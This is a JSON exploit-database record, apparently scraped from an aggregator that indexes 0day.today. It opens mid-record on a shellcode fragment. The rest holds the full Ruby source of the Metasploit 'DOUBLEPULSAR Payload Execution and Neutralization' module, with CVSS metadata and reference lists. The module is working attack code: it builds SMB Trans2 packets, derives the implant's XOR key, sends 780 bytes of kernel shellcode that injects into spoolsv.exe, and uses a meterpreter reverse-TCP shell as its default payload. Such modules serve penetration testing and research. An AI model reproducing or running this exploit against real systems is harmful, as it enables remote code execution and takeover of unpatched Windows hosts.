+\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-08] #"}, "lastseen": "2021-09-07T22:13:58", "differentElements": ["sourceData"], "edition": 10}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "ca153d531c1359dda350e8cbe355ece1", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-08T22:11:45", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-08T22:11:45", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-08T22:11:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n 